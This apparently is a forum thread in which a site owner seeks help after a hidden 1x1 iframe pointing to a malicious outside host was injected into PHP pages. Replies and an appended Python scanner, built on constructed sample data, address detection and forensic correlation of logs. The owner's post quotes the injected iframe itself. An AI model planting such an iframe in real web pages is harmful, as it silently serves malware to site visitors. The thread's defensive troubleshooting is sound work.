-
iframe worm or malware infected my php pages
Hi there,
Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present.
Now my site was reported as suspicious and Firefox and IE block access to it. Google also suspended my adwords account.
After some research I've found that someone/something inserted the code:
Code:
<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">
on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).
On the server runs Apache/2.2.11 (FreeBSD).
I've removed the code but the problem could reappear so I must get to the source: how was the code inserted, by whom and if the server is compromised?
Does anyone know something about this? What should I do further?
rkhunter and chkrootkit say that everything is ok.
Thank you
Best regards,
ddaas
-
Should've looked at permissions for the file and ownership before changing it... that could tell you what account had rights to do it. I'd grep for the file name(s) in the various bash_history files, etc.
-
I'd venture to guess that it wasn't someone who had shell access to the server. It was probably brought in via an ftp client, either on purpose or one that was compromised. If you have another one you can check the modified time and look for ftp logs...
But really, I don't know what I'm talking about.
-
Originally Posted by ddaas
on some index.php files
Disable PHP?
You probably have some insecure page somewhere else (directory traversal, not securing access, something like that) which is allowing someone to add this HTML to all these pages. It's very likely one of your PHP scripts. If you disable PHP, I bet that will prevent any future occurrences of this.
Alternately, if this site has WebDAV enabled (...why?), then someone might have learned your username and password (...you do use one when using WebDAV, right?) and used that to modify the files. Disabling WebDAV would work, in that case.
If it was a script, and you can find out which script they used, you can either fix it, or upgrade it to a non-vulnerable version (...you *do* monitor the security lists for all the PHP stuff you have installed, right? third-party forum pages, blog software, and whatever else?). But finding that out might be hard. If you had the modification time of the various .php files (which you destroyed when you changed them again), you could try to correlate that with entries in the Apache logs (which would catch both WebDAV and problematic PHP stuff), but that's going to be hard now. Though it may have been impossible before as well, as the attacker may have been able to remove their log entries. Don't know for sure though.
There have been several rashes of automated compromises of various PHP-based webpage packages, about a year ago or so. (Various forums, various blog generators, etc.) I've stopped paying attention since then, since I've sworn off PHP entirely. Wouldn't surprise me if someone found that your site used some vulnerable version of some PHP thing (via some search engine, is how they did it last year), and used that vulnerability to compromise the server.
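The two things the replies above recommend, recording owner, permissions and mtime of the injected files before cleaning them and then pulling the write-type Apache requests (POST, plus the WebDAV PUT/MOVE/COPY) logged around that mtime, can be scripted. This is an added example, not code from anyone in this thread; the iframe src, the file layout and the access_log lines are constructed sample data.

```python
import os, re, stat, tempfile
from datetime import datetime, timedelta, timezone
# Constructed pattern: a 1x1 or visibility:hidden iframe like the one quoted in the thread
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(?:width=["\']?1\b[^>]*height=["\']?1\b|visibility:\s*hidden)[^>]*>', re.I)
# Apache common/combined log prefix: client ident user [time] "METHOD path proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LOG_TIME = "%d/%b/%Y:%H:%M:%S %z"
WRITE_METHODS = {"POST", "PUT", "MOVE", "COPY"}  # PUT/MOVE/COPY are how WebDAV writes files

def find_infected(root):
    """Return (path, mtime, mode, uid) for every *.php under root carrying a hidden iframe."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php") and HIDDEN_IFRAME.search(open(path, errors="replace").read()):
                st = os.stat(path)  # capture owner/mode/mtime BEFORE editing the file destroys them
                hits.append((path, datetime.fromtimestamp(st.st_mtime, timezone.utc),
                             stat.filemode(st.st_mode), st.st_uid))
    return hits

def correlate(log_lines, mtime, window=timedelta(minutes=5)):
    """Return (client, method, path, status) of write-type requests logged within +/-window of mtime."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(3) in WRITE_METHODS:
            ts = datetime.strptime(m.group(2), LOG_TIME)
            if abs(ts - mtime) <= window:
                out.append((m.group(1), m.group(3), m.group(4), m.group(5)))
    return out

def demo():
    """Constructed sample: a clean and an injected index.php, plus three constructed log lines."""
    root, when = tempfile.mkdtemp(), datetime(2009, 3, 10, 14, 0, tzinfo=timezone.utc)
    injected = ('<iframe src="http://example.invalid/in.cgi" width=1 height=1 '
                'style="visibility: hidden">')
    for sub, body in (("clean", "<?php echo 'ok'; ?>"), ("site1", "<html>" + injected + "</html>")):
        os.makedirs(os.path.join(root, sub))
        path = os.path.join(root, sub, "index.php")
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (when.timestamp(), when.timestamp()))  # pretend it was modified at 14:00 UTC
    logs = [  # constructed Apache access_log lines; only the first is a write near the mtime
        '203.0.113.5 - - [10/Mar/2009:13:58:30 +0000] "POST /site1/upload.php HTTP/1.1" 200 512',
        '198.51.100.7 - - [10/Mar/2009:13:59:02 +0000] "GET /site1/index.php HTTP/1.1" 200 2048',
        '203.0.113.5 - - [10/Mar/2009:16:10:00 +0000] "PUT /site1/index.php HTTP/1.1" 201 0',
    ]
    infected = find_infected(root)
    return infected, correlate(logs, infected[0][1])
```

On a real server, point find_infected at the document root and correlate at the lines read from the access_log of the affected vhost; the uid and mode tell you which account could write the file, the log hits tell you which request did.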